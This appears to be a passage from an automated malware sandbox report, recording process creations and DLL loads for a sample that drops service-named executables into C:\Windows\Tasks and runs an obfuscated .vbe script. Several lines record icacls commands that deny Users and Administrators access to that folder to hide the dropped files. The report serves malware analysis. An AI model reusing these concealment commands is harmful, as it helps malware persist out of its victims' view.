Source: C:\Windows\Tasks\Wmiic.exe | Process created: C:\Windows\Tasks\IntelConfigService.exe "IntelConfigService.exe"
Source: C:\Windows\Tasks\IntelConfigService.exe | Process created: C:\Windows\Tasks\Wrap.exe C:\Windows\Tasks\Wrap.exe
Source: C:\Windows\Tasks\IntelConfigService.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c icacls C:\Windows\Tasks /deny "%username%:(R,REA,RA,RD)"
Source: C:\Windows\Tasks\Wrap.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Tasks\IntelConfigService.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c icacls C:\Windows\Tasks /deny "Users:(R,REA,RA,RD)"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Tasks\IntelConfigService.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c icacls C:\Windows\Tasks /deny "Administrators:(R,REA,RA,RD))"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Tasks\Wrap.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Windows\Tasks\ApplicationsFrameHost.exe" --daemonized
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\Tasks /deny "user-PC$:(R,REA,RA,RD)"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\Tasks /deny "Administrators:(R,REA,RA,RD))"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\Tasks\ApplicationsFrameHost.exe C:\Windows\Tasks\ApplicationsFrameHost.exe --daemonized
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\Tasks /deny "Users:(R,REA,RA,RD)"
Source: C:\Windows\Tasks\IntelConfigService.exe | Process created: C:\Windows\Tasks\Superfetch.exe C:\Windows\Tasks\Superfetch.exe
Source: C:\Windows\Tasks\IntelConfigService.exe | Process created: C:\Windows\Tasks\MSTask.exe C:\Windows\Tasks\MSTask.exe
Source: C:\Windows\Tasks\MSTask.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\net.exe net start WMService
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 start WMService
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\Tasks\1.exe "C:\windows\tasks\1.exe"
Source: C:\Windows\Tasks\1.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Windows\mJTDsOcOsyMzGWVl2p4lWXwUrl0TR0B.vbe"
Source: C:\Windows\Tasks\MSTask.exe | Process created: C:\Windows\Tasks\MSTask.exe C:\Windows\Tasks\MSTask.exe
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\fwJLoWFGhpY.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\Bridgeprovider.exe "C:\Windows/Bridgeprovider.exe"
Source: C:\Windows\Bridgeprovider.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\214ckojv\214ckojv.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Bridgeprovider.exe | Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe | Section loaded: api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe | Section loaded: api-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe | Section loaded: api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe | Section loaded: api-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe | Section loaded: api-ms-win-core-localization-l1-2-1.dll
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe | Section loaded: dxgidebug.dll
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe | Section loaded: sfc_os.dll
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe | Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe | Section loaded: riched20.dll
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe | Section loaded: usp10.dll
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe | Section loaded: msls31.dll
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe | Section loaded: bcp47langs.dll
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeSection loaded: slc.dllJump to behavior
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeSection loaded: sppc.dllJump to behavior
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeSection loaded: pcacli.dllJump to behavior
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: slc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: linkinfo.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ntshrui.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cscapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: policymanager.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msvcp110_win.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: slc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: linkinfo.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ntshrui.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cscapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: policymanager.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msvcp110_win.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\cmd.exe  Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe  Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe  Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\chcp.com  Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\chcp.com  Section loaded: fsutilext.dll
Source: C:\Windows\SysWOW64\tasklist.exe  Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe  Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe  Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe  Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe  Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe  Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe  Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe  Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe  Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe  Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe  Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe  Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe  Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe  Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\find.exe  Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\find.exe  Section loaded: fsutilext.dll
Source: C:\Windows\SysWOW64\takeown.exe  Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\takeown.exe  Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\timeout.exe  Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\icacls.exe  Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\icacls.exe  Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\icacls.exe  Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\icacls.exe  Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\icacls.exe  Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\icacls.exe  Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\icacls.exe  Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\timeout.exe  Section loaded: version.dll
Source: C:\ProgramData\migrate.exe  Section loaded: api-ms-win-core-synch-l1-2-0.dll
Source: C:\ProgramData\migrate.exe  Section loaded: api-ms-win-core-fibers-l1-1-1.dll
Source: C:\ProgramData\migrate.exe  Section loaded: api-ms-win-core-synch-l1-2-0.dll
Source: C:\ProgramData\migrate.exe  Section loaded: api-ms-win-core-fibers-l1-1-1.dll
Source: C:\ProgramData\migrate.exe  Section loaded: api-ms-win-core-localization-l1-2-1.dll
Source: C:\ProgramData\migrate.exe  Section loaded: version.dll
Source: C:\ProgramData\migrate.exe  Section loaded: dxgidebug.dll
Source: C:\ProgramData\migrate.exe  Section loaded: sfc_os.dll
Source: C:\ProgramData\migrate.exe  Section loaded: sspicli.dll
Source: C:\ProgramData\migrate.exe  Section loaded: rsaenh.dll
Source: C:\ProgramData\migrate.exe  Section loaded: uxtheme.dll
Source: C:\ProgramData\migrate.exe  Section loaded: dwmapi.dll
Source: C:\ProgramData\migrate.exe  Section loaded: cryptbase.dll
Source: C:\ProgramData\migrate.exe  Section loaded: riched20.dll
Source: C:\ProgramData\migrate.exe  Section loaded: usp10.dll
Source: C:\ProgramData\migrate.exe  Section loaded: msls31.dll
Source: C:\ProgramData\migrate.exe  Section loaded: kernel.appcore.dll
Source: C:\ProgramData\migrate.exe  Section loaded: dpapi.dll
Source: C:\ProgramData\migrate.exe  Section loaded: windowscodecs.dll
